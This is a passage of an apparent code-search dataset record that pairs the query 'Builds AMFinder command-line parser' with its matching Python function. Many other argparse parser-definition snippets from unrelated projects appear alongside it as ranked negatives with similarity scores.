Defaults to comma (,).\")\n\n\treturn parser.parse_args()", "def parse_arguments(args):", "def define_parameters(self):", "def extra_target_arguments(self):\n return {}", "def add_arguments(cls, arg_parser: ArgParser) -> None:", "def add_arguments(self, parser):\n parser.add_argument('--print', action='store_true', required=False, help='Print details')", "def _set_arguments(self):\n cert_location = f\"dependencies{sep}certificates{sep}localuser.crt\"\n key_location = f\"dependencies{sep}certificates{sep}localuser.key\"\n assert Path(cert_location).exists(), (\n f\"The certificate isn't \"\n f\"present at location {Path(cert_location).absolute()}\"\n )\n assert Path(key_location).exists(), (\n f\"The certificate key isn't \"\n f\"present at location {Path(key_location).absolute()}\"\n )\n self._arguments = [\n (\n \"test-certificate-verify\",\n [\"-k\", key_location, \"-c\", cert_location],\n ),\n (\n \"test-sig-algs\",\n [],\n ),\n (\n \"test-clienthello-md5\",\n [],\n ),\n (\n \"test-tls13-pkcs-signature\",\n [],\n ),\n ]", "def args_str(self):", "def add_args(self, parser):", "def init_args(self):\n return {\n \"doc\": self.__doc__.format(name=colored(self.module_name, \"green\", attrs=['bold','underline'])),\n \"Url\": \"set a target url\",\n 'Type': \"set type to check , [php, asp, aspx, cgi, dir , mdb]\",\n }", "def base_arguments(self):\n raise NotImplementedError()", "def add_arguments(self):\n super().add_arguments()\n self.parser.add_argument(\n \"sql_command\",\n help=\"The SQL commmand to execute. Use <odb> to reference the filename.\",\n type=str\n )", "def arguments(**kw):\n return export_arguments('cc', _all_arguments, _groups, **kw)", "def definearguments(self, customparser):\r\n if not customparser:\r\n return\r\n\r\n self.cmdbase.add_login_arguments_group(customparser)\r\n\r\n customparser.add_argument(\r\n \"--fulltypes\",\r\n dest=\"fulltypes\",\r\n action=\"store_true\",\r\n help=\"Optionally include this flag if you would prefer to \"\r\n \"return the full type name instead of the simplified versions\"\r\n \" (Redfish only option).\",\r\n default=None,\r\n )", "def definearguments(self, customparser):\n if not customparser:\n return\n\n add_login_arguments_group(customparser)\n\n customparser.add_argument(\n '--serviceaccount',\n dest='serviceacc',\n action=\"store_true\",\n help=\"Optionally include this flag if you wish to created account \"\\\n \"to be a service account.\",\n default=False\n )\n customparser.add_argument(\n '--addprivs',\n dest='optprivs',\n nargs='*',\n action=_AccountParse,\n type=str,\n help=\"Optionally include this flag if you wish to specify \"\\\n \"which privileges you want added to the iLO account. This overrides the default of \"\\\n \"duplicating privileges of the currently logged in account on the new account. Pick \"\\\n \"privileges from the privilege list in the above help text. EX: --addprivs=1,2,4\",\n default=None\n )\n customparser.add_argument(\n '--removeprivs',\n dest='optprivs',\n nargs='*',\n action=_AccountParse,\n type=str,\n help=\"Optionally include this flag if you wish to specify \"\\\n \"which privileges you want removed from the iLO account. This overrides the default of\"\\\n \" duplicating privileges of the currently logged in account on the new account. Pick \"\\\n \"privileges from the privilege list in the above help text. 
EX: --removeprivs=1,2,4\",\n default=None\n )\n customparser.add_argument(\n '--role',\n dest='role',\n choices=['Administrator', 'ReadOnly', 'Operator'],\n help=\"Optionally include this flag if you would like to specify Privileges by role. \"\\\n \"Valid choices are: Administrator, ReadOnly, Operator\",\n default=None\n )\n customparser.add_argument(\n '-j',\n '--json',\n dest='json',\n action=\"store_true\",\n help=\"Optionally include this flag if you wish to change the\"\\\n \" displayed output to JSON format. Preserving the JSON data\"\\\n \" structure makes the information easier to parse.\",\n default=False\n )", "def command_line_arguments():\n\n try:\n parser = argparse.ArgumentParser(description='Log Handler/Cleaner/Copier for Idemia DocAuth')\n\n # Add required arguments.\n parser.add_argument('action', choices=['clean', 'download'], type=str, help='clean or download')\n\n # Parse the arguments\n args = parser.parse_args()\n\n return args\n\n except Exception as err:\n print(err)\n return", "def __add_common_args(parser: argparse.ArgumentParser):\n parser.add_argument(\"--model\", help=\"name of the model to use. Use query --get-models to get a list of valid names.\")\n parser.add_argument(\"--grid-type\", help=\"type of the grid to use.\")\n parser.add_argument(\"--level-type\", help=\"type of the vertical level to use.\")\n parser.add_argument(\"--init-time\", help=f\"initialization time to use. \"\n \"Integers are interpreted as hours since model start, dates formatted as \"\n f\"{__DATE_FORMAT.replace('%Y', 'YYYY').replace('%m', 'MM').replace('%d', 'DD').replace('%H', 'HH').replace('%M', 'MM')} are interpreted as absolute start dates.\")\n parser.add_argument(\"--variable\", nargs=\"+\", help=\"name of the variable to use. Use query --get-vars to get a list of valid names.\")\n parser.add_argument(\"--levels\", nargs=\"+\", type=int, help=\"levels to use.\")\n parser.add_argument(\"--lead-time\", nargs=\"+\", type=int, help=\"lead times to use in hours.\")", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(\n usage='Optimizes a boolean-based ensemble using Univariate Marginal Distribution Algorithm.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n # Adds a descriptor argument with pre-defined choices\n parser.add_argument('descriptor', help='Descriptor identifier', choices=['global', 'cnn', 'all'])\n\n # Adds an identifier argument to the desired fold identifier\n parser.add_argument('fold', help='Fold identifier', type=int, choices=range(1, 6))\n\n # Adds an identifier argument to the desired number of agents\n parser.add_argument('-n_agents', help='Number of meta-heuristic agents', type=int, default=10)\n\n # Adds an identifier argument to the desired number of iterations\n parser.add_argument('-n_iter', help='Number of meta-heuristic iterations', type=int, default=10)\n\n return parser.parse_args()", "def arg_err(self,func):\n print 'Error in arguments:'\n print inspect.getdoc(func)", "def __getinitargs__(self):\n\n return (self.admin_property_err,)", "def add_arguments_imp(self, parser): # noqa\n parser.add_argument(\n 'what',\n nargs='?',\n help=(\n 'Print the value of /ROOT/<what>_dir. 
For example: ' +\n '\"dodo which src\" prints the value of /ROOT/src_dir.')\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n '--config',\n action=\"store_true\",\n help='Print where the config file is')\n group.add_argument(\n '--script',\n help='Print where the dodo command script with given name is')", "def command_line_arguments():\n _parser.add_argument('-l', '--list', nargs='+',\n help='<Required> Set flag', required=True)\n _parser.add_argument(\"-A\", \"--access\", required=True,\n help=\"access to host => grant/revoke\")", "def add_args(parser):\r\n parser.add_argument(\"data\", help=\"path to data directory\")\r\n parser.add_argument(\r\n \"--silence-token\", default=\"\\u2581\", help=\"token for silence (used by w2l)\"\r\n )\r\n parser.add_argument(\r\n \"--max-source-positions\",\r\n default=sys.maxsize,\r\n type=int,\r\n metavar=\"N\",\r\n help=\"max number of frames in the source sequence\",\r\n )\r\n parser.add_argument(\r\n \"--max-target-positions\",\r\n default=1024,\r\n type=int,\r\n metavar=\"N\",\r\n help=\"max number of tokens in the target sequence\",\r\n )", "def add_app_arguments(self, parser: argparse.ArgumentParser):\n pass", "def define_parameters(self):\n\n self.add_argument('--input1',dest='input1',type=str,optional=False,\n help='What file do you want to upload?')\n self.add_argument('--input2',dest='input2',type=str,optional=False,\n help='What file do you want to upload?')", "def add_arguments(self, sub_parser):\n sp = sub_parser", "def Args(parser):\n flags.AddRegion(parser)\n flags.AddCluster(parser)", "def __common_args_handler(parser):\n parser.add_argument(\"-netloc\", help=\"<host>:<port>\", default=\"[::]:50051\", type=str)\n parser.add_argument(\"-debug\", help=\"Print debug messages.\", action=\"store_true\")\n args = parser.parse_args(sys.argv[2:])\n logging.basicConfig(level=logging.DEBUG if args.debug else logging.INFO)\n return args", "def apply_args(self):\n\n args = self.args\n\n Test.compile_only = args.compile_only\n Test.skip_comparison = args.skip_comparison\n Test.global_tolerance = args.tolerance\n Test.global_abs_tolerance = args.abs_tolerance\n Test.global_particle_tolerance = args.particle_tolerance\n Test.performance_params = args.check_performance", "def add_required_arguments(self, *args):\n self._add_sample_specific_arguments(True, *args)", "def add_app_arguments(self, parser: argparse.ArgumentParser) -> None:\n pass", "def add_extra_args(self):\n self.parser.add_argument(\"--region\", required=False)\n self.parser.add_argument(\"--zone\", required=False)\n self.parser.add_argument(\"--network\", required=False)", "def set_options():\n parser = argparse.ArgumentParser(description='test hexrd.quadrature')\n\n return parser", "def get_arguments():\n\tparser.add_argument('-i', '--interface', help='interface to affect')\n\tparser.add_argument('-m','--mac', help='mac to allocate')\n\n\targs = parser.parse_args()\n\tinterface = args.interface\n\tmac = args.mac\n\treturn (interface, mac)", "def process_arguments():\n # Create ArgumentParser object. 
Description message will be displayed as part of help message if script is run with -h flag\n parser = argparse.ArgumentParser(description='Prints tier 1 and 2 variant details to stdout for a given 100k case')\n # Define the arguments that will be taken.\n parser.add_argument('-i', '--ir_id', required=True, help='GeL Interpretation Request ID in format 12345-1')\n parser.add_argument('-p', '--proband_id', required=True, help='GeL participant ID for proband')\n # Return the arguments\n return parser.parse_args()", "def arguments_base(token):\n return Arguments(\n verbose=TEST_VERBOSE,\n token=token,\n slug=TEST_SLUG,\n tag=TEST_TAG,\n body=TEST_BODY,\n rel_name=TEST_REL_NAME,\n commitish=TEST_COMMITISH\n )", "def __init__( self ):\n self.arguments = []\n self._opt_specs = []\n self._pos_specs = []\n self._values = {}", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def declare_gather_args():\n\n # declare args\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('values', help='comma-separated values to barchart')\n parser.add_argument('--labels', help='comma-separated labels for barchart')\n parser.add_argument('--title', help='title', default='')\n parser.add_argument('--rotatelabels', help='rotate labels 90 degrees?', action=\"store_true\")\n parser.add_argument('--outpdf', required=True, type=argparse.FileType('w'),\n help='output file')\n\n parser.add_argument('--debug', action=\"store_true\", help='Enable debug logging')\n return parser.parse_args()", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(usage='Creates an ensemble of classifiers based on majority voting.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n return parser.parse_args()", "def Args(parser):\n parser.add_argument('--service', '-s', help='Limit to specific service.')\n parser.add_argument('--version', '-v', help='Limit to specific version.')\n parser.add_argument('--limit', required=False, type=int,\n default=200, help='Number of log entries to show.')\n parser.add_argument('--level', required=False, default='any',\n choices=LOG_LEVELS,\n help='Filter entries with severity equal to or higher '\n 'than a given level.')\n\n parser.add_argument('--logs',\n required=False,\n default=['stderr', 'stdout', 'crash.log'],\n metavar='APP_LOG',\n type=arg_parsers.ArgList(min_length=1),\n help=('Filter entries from a particular set of logs. 
'\n 'Must be a comma-separated list of log names '\n '(request_log, stdout, stderr, etc).'))", "def _configure_args(self, parser: ArgumentParser) -> ArgumentParser:\n pass", "def Args(parser):\n parser.add_argument('metric_name', help='The name of the new metric.')\n parser.add_argument(\n '--description', required=True,\n help='The metric\\'s description.')\n parser.add_argument(\n '--log-filter', required=True,\n help='The metric\\'s filter expression. '\n 'The filter must be for a V2 LogEntry.')", "def add_args(self):\n raise NotImplementedError", "def add_arguments(self, parser):\n parser.add_argument('asins', nargs='+', type=str)", "def add_step_args(cls, parser):", "def get_arguments():\n parser = argparse.ArgumentParser(description=\"DeepLab-ResNet Network\")\n parser.add_argument(\"--mode\", choices={\"SUM\", \"VAL\"}, default=\"VAL\", help=\"\")\n parser.add_argument(\"--sdf-path\", type=str, default=SDF_PATH, help=\"\")\n parser.add_argument(\"--summary-file\", type=str, default=SUMMARY_FILE, help=\"\")\n\n return parser.parse_args()", "def parse_arguments():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('--adj', help=\"\"\".adj file regulon\"\"\", \n type=argparse.FileType(mode='r'), required=True)\n parser.add_argument('--expr_genes', help=\"\"\"list of gene IDs in expression \n matrix (first column of expr matrix)\"\"\", \n type=argparse.FileType(mode='r'), required=True)\n # parser.add_argument('--cutoff_percent', help=\"\"\"remove entire row (regulator plus genes)\n # if percent (out of 100) of genes remaining is below this value AND # genes remaining is below\n # the cutoff_number argument\"\"\", type=int, required=False, default=30)\n \n parser.add_argument('--cutoff_number', help=\"\"\"\"remove entire row (regulator plus regulon genes)\n if number of genes remaining is below this value, defaults to 25\"\"\", type=int, required=False, default=25)\n args = parser.parse_args()\n\n return args", "def args(self, value):\n # obtener la linea de comandos convertida a dict, eliminando algunos\n self._args = self.clean_command_line(value)\n\n # obtener el archivo de configuracion\n config = self.get_config()\n\n # Cliente actual, de los parametros, este siempre tiene precedencia\n client = self._args.get('client')\n\n # Fallback lo saco de la configuracion, y si tampoco esta es un error\n if not client:\n client = config.get('client')\n self._args['client'] = client\n\n # si aca no tengo definido el cliente termino con error\n if not client:\n msg.err('Need -c option (client name). Process aborted')\n\n # obtener la configuracion para el cliente actual.\n client_config = config.get(client, {})\n\n # Mezclo argumentos de linea de comandos con configuracion\n # la linea de comandos tiene precedencia\n for item in client_config or []:\n if item not in self._args:\n self._args[item] = client_config.get(item)\n\n # agregar valores por defecto si no estan definidos\n self.add_default_values()\n\n # si aca no tengo definido la aplicacion default termino con error\n if not self._args.get('defapp'):\n msg.err('Need --defapp option (default application). 
'\n 'Process aborted')\n\n self.save_config()", "def report_args(args):\n\n print (\"SETTINGS:\\n\")\n print (\"-f : Output data file >> {:s}\".format(args.file))\n print (\"-l : Length of data series >> {:d}\".format(args.length))\n print (\"-p : Process >> {:s}\".format(args.process))\n print (\"-d : Ouput diretory >> {:s}\".format(args.directory))\n print (\"\\n\")", "def getPositionalArgs():", "def __init__(self, *args, **kwargs):\n argparse.ArgumentParser.__init__(self, *args, **kwargs)\n self.add_argument(\n '--log-level', env_var='COSA_LOG_LEVEL', default='info',\n choices=log._nameToLevel.keys(), help='Set the log level')", "def extra_args(self):\n return []", "def __add_arguments__(cls, parser: ArgumentParser) -> None:\n\n parser.add_argument(\n \"-j\",\n \"--json_local_path\",\n required=True,\n type=str,\n help=(\n \"Full path to the local json dictionary saved in the validation step, eg /mnt/vol/dict.json.\"\n ),\n )\n\n parser.add_argument(\n \"-n\",\n \"--dictionary_name\",\n required=True,\n type=str,\n help=(\n \"The human readable name for the data dictionary, eg 'baseline' or 'follow up'.\"\n ),\n )\n\n parser.add_argument(\n \"-s\",\n \"--study_id\",\n required=True,\n type=str,\n help=(\n \"The MDS study id associated with the data set.\"\n ),\n )\n\n parser.add_argument(\n \"-o\",\n \"--output\",\n required=True,\n type=str,\n help=(\n \"Path to write out the JSON response with upload_status.\"\n ),\n )", "def AddArguments(cls, argument_group):", "def args(self, args):\n self._instructions_setter('ARG', args)", "def construct_arguments(self, x):\n\n # Denormalize free parameters\n denormalized_values = self.denormalize_bounds(x)\n arguments = dict(zip(self.free_parameters, denormalized_values.flatten()))\n \n\n self.log_vars = ['connectivity', 'llambda', 'llambda2', 'enet_strength',\n 'noise', 'regularization', 'dt', 'gamma_cyclic' \n ]\n\n # Add fixed parameters\n for name in self.fixed_parameters:\n value = self.bounds[name]\n arguments[name] = value\n # if name in self.log_vars:\n # arguments[name] = 10. ** value\n # else:\n \n\n for var in self.log_vars:\n if var in arguments:\n arguments[var] = 10. ** arguments[var] # Log scale correction\n\n #assert False, f'args {arguments}'\n\n if 'n_nodes' in arguments:\n arguments['n_nodes'] = tensor(arguments['n_nodes'], dtype = torch.int32, device = self.device, requires_grad = False) # Discretize #torch.adjustment required\n\n if not self.feedback is None:\n arguments['feedback'] = self.feedback\n \n for argument, val_tensor in arguments.items():\n \n try:\n arguments[argument] = arguments[argument].item()\n except:\n arguments[argument] = arguments[argument]\n return arguments", "def cli(*args, **kwargs):\n logger.debug('Global options: %s %s', args, kwargs)", "def arguments(self, arguments):\n\n self._arguments = arguments", "def add_command_line_arguments(self, parser):\n # parser.add_option(...)\n pass", "def add_cmdline_args(cls, argparser):\n agent = argparser.add_argument_group('Safe Local Human Arguments')\n agent.add_argument(\n '--safety',\n type=str,\n default='all',\n choices={'none', 'string_matcher', 'classifier', 'all'},\n help='Apply safety filtering to messages',\n )\n super(SafeLocalHumanAgent, cls).add_cmdline_args(argparser)" ]
[ "0.67259675", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.6644485", "0.65979254", "0.6563293", "0.65430915", "0.6472136", "0.64492387", "0.64492387", "0.64112806", "0.63782823", "0.6311546", "0.6246682", "0.6226592", "0.6199888", "0.61745524", "0.61669433", "0.61669123", "0.6147256", "0.61315453", "0.6127668", "0.61140746", "0.6099239", "0.60826594", "0.6079387", "0.607041", "0.60540926", "0.60515136", "0.60361147", "0.60358506", "0.601154", "0.59951425", "0.5984163", "0.59799063", "0.59794086", "0.59724075", "0.5957235", "0.59421116", "0.59378576", "0.593626", "0.5929914", "0.5929379", "0.5918555", "0.59180236", "0.5913985", "0.59009147", "0.5870313", "0.5868232", "0.5858202", "0.5843976", "0.58340216", "0.5820698", "0.5818526", "0.5808907", "0.57804906", "0.57771254", "0.5776181", "0.57676286", "0.57624525", "0.57470447", "0.57319754", "0.5724683", "0.5722328", "0.5687946", "0.5687698", "0.56770295", "0.56678003", "0.56672066", "0.56595325", "0.5656694", "0.5656377", "0.5654538", "0.565266", "0.56520796", "0.5636565", "0.56316143", "0.5631216", "0.5627731", "0.5627165", "0.56208456", "0.56199586", "0.56126124", "0.559856", "0.55893743", "0.5588341", "0.55713254", "0.55668414", "0.5559327", "0.55582154", "0.55562216", "0.55533904", "0.5549863", "0.55488586", "0.5541531", "0.5541176" ]
0.0
-1
Builds AMFinder commandline parser.
def build_arg_parser():

    main = ArgumentParser(description='AMFinder command-line arguments.',
                          allow_abbrev=False,
                          formatter_class=RawTextHelpFormatter)

    subparsers = main.add_subparsers(dest='run_mode', required=True,
                                     help='action to be performed.')

    _ = training_subparser(subparsers)
    _ = prediction_subparser(subparsers)
    _ = diagnostic_subparser(subparsers)

    return main
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_parser(self, parser: ArgumentParser) -> None:", "def create_parser() -> configargparse.ArgParser:\n parser = configargparse.ArgParser(default_config_files=[\n \"/etc/lookout/analyzer.conf\", \"~/.config/lookout/analyzer.conf\"],\n formatter_class=ArgumentDefaultsHelpFormatterNoNone,\n auto_env_var_prefix=\"lookout_\")\n slogging.add_logging_args(parser)\n subparsers = parser.add_subparsers(help=\"Commands\", dest=\"command\")\n\n def add_parser(name, help):\n return subparsers.add_parser(\n name, help=help, formatter_class=ArgumentDefaultsHelpFormatterNoNone)\n\n list_parser = add_parser(\"list\", \"Print globally available analyzers.\")\n list_parser.set_defaults(handler=list_analyzers)\n\n run_parser = add_parser(\n \"run\", \"Launch a new service with the specified (one or more) analyzers.\")\n run_parser.set_defaults(handler=run_analyzers)\n add_analyzer_arg(run_parser)\n run_parser.add(\"-c\", \"--config\", is_config_file=True,\n help=\"Path to the configuration file with option defaults.\")\n run_parser.add(\"-s\", \"--server\", required=True,\n help=\"Lookout server address, e.g. localhost:1234.\")\n run_parser.add(\"-w\", \"--workers\", type=int, default=1,\n help=\"Number of threads which process Lookout events.\")\n add_model_repository_args(run_parser)\n run_parser.add_argument(\"--request-server\", default=\"auto\",\n help=\"Address of the data retrieval service. \\\"same\\\" means --server.\")\n\n init_parser = add_parser(\"init\", \"Initialize the model repository.\")\n init_parser.set_defaults(handler=init_repo)\n add_model_repository_args(init_parser)\n\n tool_parser = add_parser(\"tool\", \"Invoke the tooling of a given analyzer.\")\n tool_parser.set_defaults(handler=run_analyzer_tool)\n tool_parser.add(\"analyzer\", help=\"Fully qualified package name with an analyzer.\")\n tool_parser.add(\"args\", nargs=argparse.REMAINDER)\n\n package_parser = add_parser(\n \"package\",\n \"Package several analyzers to a Docker container and write a sample Docker Compose config \"\n \"for Lookout.\")\n package_parser.set_defaults(handler=package_cmdline_entry)\n add_analyzer_arg(package_parser)\n package_parser.add(\"-w\", \"--workdir\", help=\"Generate files in this directory.\",\n default=tempfile.mkdtemp(prefix=\"lookout_package_\"))\n package_parser.add(\"--requirements\", help=\"Path to a custom requirements.txt\")\n package_parser.add(\"-r\", \"--repo\", help=\"GitHub repository name to watch. \"\n \"Example: \\\"src-d/lookout\\\".\",\n required=True)\n package_parser.add(\"-u\", \"--user\", help=\"GitHub user name which will send review comments.\",\n required=True)\n paturl = \"https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/\" # noqa\n package_parser.add(\"-t\", \"--token\", help=\"GitHub token for -u/--user. 
See \" + paturl,\n required=True)\n package_parser.add(\"-y\", \"--yes\", help=\"Run the commands in the end.\",\n action=\"store_true\")\n package_parser.add(\"-n\", \"--no\", help=\"Do not run the commands in the end.\",\n action=\"store_true\")\n return parser", "def build_parser(self):\n parser = argparse.ArgumentParser(\n description=\"Run Crystal Matching algorithm attempting to translate co-ordinates \"\n \"on an input image to the coordinate-space of an output image while \"\n \"accounting for possible movement of crystals in the sample.\")\n\n if sys.version_info[0] < 3:\n parser.add_argument('Formulatrix_image',\n metavar=\"Formulatrix_image_path\",\n type=file,\n help='Image file from the Formulatrix - selected_point should correspond to co-ordinates on '\n 'this image.')\n else:\n parser.add_argument('Formulatrix_image',\n metavar=\"Formulatrix_image_path\",\n type=argparse.FileType('r'),\n help='Image file from the Formulatrix - selected_point should correspond to co-ordinates on '\n 'this image.')\n parser.add_argument('beamline_stack_path',\n metavar=\"beamline_stack_path\",\n help=\"A path pointing at a directory which stores images to be stacked or a path to a stacked image.\")\n parser.add_argument('selected_points',\n metavar=\"x,y\",\n nargs='*',\n help=\"Comma-separated co-ordinates of selected points to be translated from the marked image \"\n \"to the target image.\")\n parser.add_argument('-o','--output',\n metavar=\"focused_image_path\",\n help=\"Specify directory for the stacked image. \"\n \"A file called 'processed.tif' will be created in the directory.\"\n \"'processed.tif' will be created in log directory if this is not set.\")\n parser.add_argument('--config',\n metavar=\"path\",\n action=ReadableConfigDir,\n default=join(self.get_script_path(), readable_config_dir.CONFIG_DIR_NAME),\n help=\"Sets the configuration directory.\")\n parser.add_argument('--scale',\n metavar=\"scale\",\n help=\"The scale between the Formulatrix and beamline image given as the resolution of each \"\n \"image separated by a colon. 
Note this is relative (1:2 is the same as 2:4) and a value \"\n \"must be specified for each image using the format \"\n \"'[Formulatrix_image_resolution]:[beamline_image_resolution]'.\")\n parser.add_argument('-j', '--job',\n metavar=\"job_id\",\n help=\"Specify a job_id - this will be reported in the output to help identify this run.\")\n parser.add_argument('--to_json',\n action='store_true',\n help=\"Output a JSON object.\")\n parser.add_argument('--version',\n action='version',\n version=VersionHandler.version_string())\n parser.add_argument('--log',\n metavar=\"path\",\n help=\"Write log files to the directory specified by path.\")\n self.parser = parser", "def make_parser():\n parser_ = argparse.ArgumentParser(\n description=\"\"\"\n A tool to retrieve history from\n (almost) any browser on (almost) any platform\n\n██████╗ ██████╗ ██████╗ ██╗ ██╗███████╗███████╗██████╗ ██╗ ██╗██╗███████╗████████╗ ██████╗ ██████╗ ██╗ ██╗\n██╔══██╗██╔══██╗██╔═══██╗██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║██║██╔════╝╚══██╔══╝██╔═══██╗██╔══██╗╚██╗ ██╔╝\n██████╔╝██████╔╝██║ ██║██║ █╗ ██║███████╗█████╗ ██████╔╝█████╗███████║██║███████╗ ██║ ██║ ██║██████╔╝ ╚████╔╝\n██╔══██╗██╔══██╗██║ ██║██║███╗██║╚════██║██╔══╝ ██╔══██╗╚════╝██╔══██║██║╚════██║ ██║ ██║ ██║██╔══██╗ ╚██╔╝\n██████╔╝██║ ██║╚██████╔╝╚███╔███╔╝███████║███████╗██║ ██║ ██║ ██║██║███████║ ██║ ╚██████╔╝██║ ██║ ██║\n╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚══╝╚══╝ ╚══════╝╚══════╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝\n \"\"\", # noqa: E501\n epilog=\"\"\"\n Checkout the GitHub repo\n https://github.com/pesos/browser-history\n if you have any issues or want to help contribute\"\"\",\n formatter_class=RawDescriptionHelpFormatter,\n )\n\n parser_.add_argument(\n \"-t\",\n \"--type\",\n default=\"history\",\n help=f\"\"\"\n argument to decide whether to retrieve history or bookmarks.\n Should be one of {AVAILABLE_TYPES}.\n Default is history.\"\"\",\n )\n parser_.add_argument(\n \"-b\",\n \"--browser\",\n default=\"all\",\n help=f\"\"\"\n browser to retrieve history or bookmarks from. Should be one\n of all, default, {AVAILABLE_BROWSERS}.\n Default is all (gets history or bookmarks from all browsers).\n \"\"\",\n )\n\n parser_.add_argument(\n \"-f\",\n \"--format\",\n default=\"infer\",\n help=f\"\"\"\n Format to be used in output. Should be one of {AVAILABLE_FORMATS}.\n Default is infer (format is inferred from the output file's\n extension. If no output file (-o) is specified, it defaults to csv)\"\"\",\n )\n\n parser_.add_argument(\n \"-o\",\n \"--output\",\n default=None,\n help=\"\"\"\n File where history output or bookmark output is to be written.\n If not provided, standard output is used.\"\"\",\n )\n\n parser_.add_argument(\n \"-p\",\n \"--profile\",\n default=None,\n help=\"\"\"\n Specify the profile from which to fetch history or bookmarks. If\n not provided all profiles are fetched\n \"\"\",\n )\n\n parser_.add_argument(\n \"--show-profiles\",\n default=None,\n metavar=\"BROWSER\",\n help=f\"\"\"\n List all available profiles for a given browser where browser\n can be one of default, {AVAILABLE_BROWSERS}. 
The browser\n must always be provided.\n \"\"\",\n )\n\n parser_.add_argument(\n \"-v\", \"--version\", action=\"version\", version=\"%(prog)s \" + __version__\n )\n\n return parser_", "def build_parser():\n def commaSplitter(str):\n \"\"\"\n Argparse a comm-seperated list\n \"\"\"\n # leave this here as a reminder of what I should do to make the argument parsing more robust\n\n # if sqrt != int(sqrt):\n # msg = \"%r is not a perfect square\" % string\n # raise argparse.ArgumentTypeError(msg)\n # return value\n return str.split(',')\n\n def existing_file(fname):\n \"\"\"\n Argparse type for an existing file\n \"\"\"\n if not os.path.isfile(fname):\n raise ValueError(\"Invalid file: \" + str(fname))\n return fname\n\n parser = argparse.ArgumentParser(description=__doc__)\n\n parser.add_argument('-p', '--prefix', help='dont really know what this does...',\n action='store', default='patient', dest='prefix')\n parser.add_argument('-d', '--date', help='dont really know what this does...',\n action='store', default='', dest='sampledate')\n parser.add_argument('template', type=argparse.FileType('r'), help='BEAST config template file')\n parser.add_argument('fasta', type=argparse.FileType('r'), help='file of sequences (in FASTA format)')\n\n return parser", "def build_parser ():\n\n parser = argparse.ArgumentParser (description = __doc__)\n\n parser.add_argument (\n '-v', '--verbose', dest='verbose', action='count',\n help='increase output verbosity', default=0\n )\n parser.add_argument (\n '-l', '--live', dest='get_live_data', action='store_true',\n help='get live data from OSM database',\n )\n parser.add_argument (\n '-e', '--edit', action='store_true',\n help='edit the OSM database',\n )\n parser.add_argument (\n '-u', '--user', dest='my_edits', action='store_true',\n help='only report about my edits',\n )\n parser.add_argument (\n '--min-length', dest=\"min_length\", type=float, default=1000.0,\n help='way must be longer than this to get a ref (in m) (default=1000)',\n )\n parser.add_argument (\n '--batch-size', dest=\"batch_size\", type=int, default=10,\n help='apply OSM edits in changesets of this size (default=10)',\n )\n return parser", "def build_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-r', '--reference', required=True, help=\"Reference Genome URL\")\n parser.add_argument('-n', '--normal', required=True, help='Normal BAM URL. Format: UUID.normal.bam')\n parser.add_argument('-t', '--tumor', required=True, help='Tumor BAM URL. Format: UUID.tumor.bam')\n parser.add_argument('-d', '--dbsnp', required=True, help='dbsnp_132_b37.leftAligned.vcf URL')\n parser.add_argument('-c', '--cosmic', required=True, help='b37_cosmic_v54_120711.vcf URL')\n parser.add_argument('-u', '--mutect', required=True, help='Mutect.jar')\n parser.add_argument('-w', '--work_dir', required=True, help='Where you wanna work from? 
(full path please)')\n\n return parser", "def buildParser():\n\n parser = argparse.ArgumentParser(\n description='Script to parse bagfile to json file')\n parser.add_argument('-b', '--bag', help='Bag file to read',\n required=True, type=str)\n parser.add_argument('-i', '--include',\n help='list or regex for topics to include',\n required=False, nargs='*')\n parser.add_argument('-e', '--exclude',\n help='list or regex for topics to exclude',\n required=False, nargs='*')\n parser.add_argument('-o', '--output',\n help='name of the output file',\n required=True)\n return parser", "def build_argparser(self):\n firstletters = ''\n for name, (categ, rest) in self.data.items():\n firstletters += name[0]\n\n self.argparser = argparse.ArgumentParser(\n usage='m3 x {} [arguments]'.format(self.name))\n\n for name, (categ, rest) in self.data.items():\n argargs = {}\n if rest.get('help'):\n argargs['help'] = rest['help']\n if rest.get('type') == 'flag':\n argargs['action'] = 'store_true'\n argargs['required'] = False\n elif 'default' not in rest:\n argargs['required'] = True\n if firstletters.count(name[0]) == 1:\n self.argparser.add_argument('-' + name[0],\n '--' + name, **argargs) # noqa: T484\n else:\n self.argparser.add_argument('--' + name, **argargs) # noqa:T484", "def _CreateParser():\n parser = commandline.ArgumentParser(description=__doc__, caching=True)\n\n # TODO(rcui): Have this use the UI-V2 format of having source and target\n # device be specified as positional arguments.\n parser.add_argument('--force', action='store_true', default=False,\n help='Skip all prompts (i.e., for disabling of rootfs '\n 'verification). This may result in the target '\n 'machine being rebooted.')\n sdk_board_env = os.environ.get(cros_chrome_sdk.SDKFetcher.SDK_BOARD_ENV)\n parser.add_argument('--board', default=sdk_board_env,\n help=\"The board the Chrome build is targeted for. When \"\n \"in a 'cros chrome-sdk' shell, defaults to the SDK \"\n \"board.\")\n parser.add_argument('--build-dir', type='path',\n help='The directory with Chrome build 